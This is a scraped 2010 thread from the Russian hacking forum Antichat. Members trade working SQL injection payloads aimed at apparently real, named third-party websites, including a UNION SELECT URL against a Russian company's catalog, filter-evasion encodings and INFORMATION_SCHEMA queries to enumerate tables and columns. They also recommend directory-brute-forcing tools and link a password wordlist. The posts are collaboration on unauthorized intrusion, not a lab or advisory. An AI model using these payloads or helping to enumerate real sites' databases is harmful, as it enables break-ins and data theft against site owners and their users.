Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.01.2010, 13:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от v1d0qz
Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена 
По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., там запятая косит запрос, потому блинд огранизовать пока не удалось. Если реально как-то сделать без запятых, я внимательно слушаю
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично. ну спс буду поковырят, если что составиш правильный запрос жду резултатов.
Вот тока не пойму как можно выводит sql запросы на браузер, тоесть что отправлю через гет пост и на какой запрос превращается
|
|
|
22.01.2010, 14:07
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
не могу подобрать именя таблиц и столбцов в 4ой версии (П.С. вывод виден только в исходном коде стр.), нужна Ваша помощь
http://elmash-holding.ru/elmcatalog/?subclass=-42+union+select+1,version()--
|
|
|
|
22.01.2010, 14:10
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Не подскажите пожалуйста хороший сканер для директорий сайта ..?
|
|
|
|
22.01.2010, 14:17
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
erolom, security-digger.org
|
|
|
|
22.01.2010, 15:02
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
wolmer, смахивает на DLE
|
|
|
|
22.01.2010, 15:02
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
|
|
|
|
22.01.2010, 19:49
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
х3, думаю покатит
Последний раз редактировалось G4bR1eL; 22.01.2010 в 23:47..
|
|
|
|
22.01.2010, 20:14
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от G4bR1eL
'1' UNION SELECT 1,TABLE_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES --
Вывело список таблиц, причем всех
'1' UNION SELECT 1, COLUMN_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TABLE' LIMIT 2,1 --
TABLE также пробовал в hex виде (0х***)
Выскакивает при попытке подать запрос следующее:
com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorEx ception: Unknown column '*!?TABLE*!?' in 'where clause'
Я так понимаю перебирать только вручную поможет?
проверь имя таблицы
|
|
|
|
22.01.2010, 20:15
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
2erolom DirBuster написан на Java лудшего пока не встречал в коплекте огромные словари
|
|
|
|
22.01.2010, 20:57
|
|
Познающий
Регистрация: 26.12.2009
Сообщений: 66
Провел на форуме:
70384
Репутация:
-25
|
|
словарик..http://www.chestor92.ru/publ/slovari_dlja_bruta/1-1-0-47
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
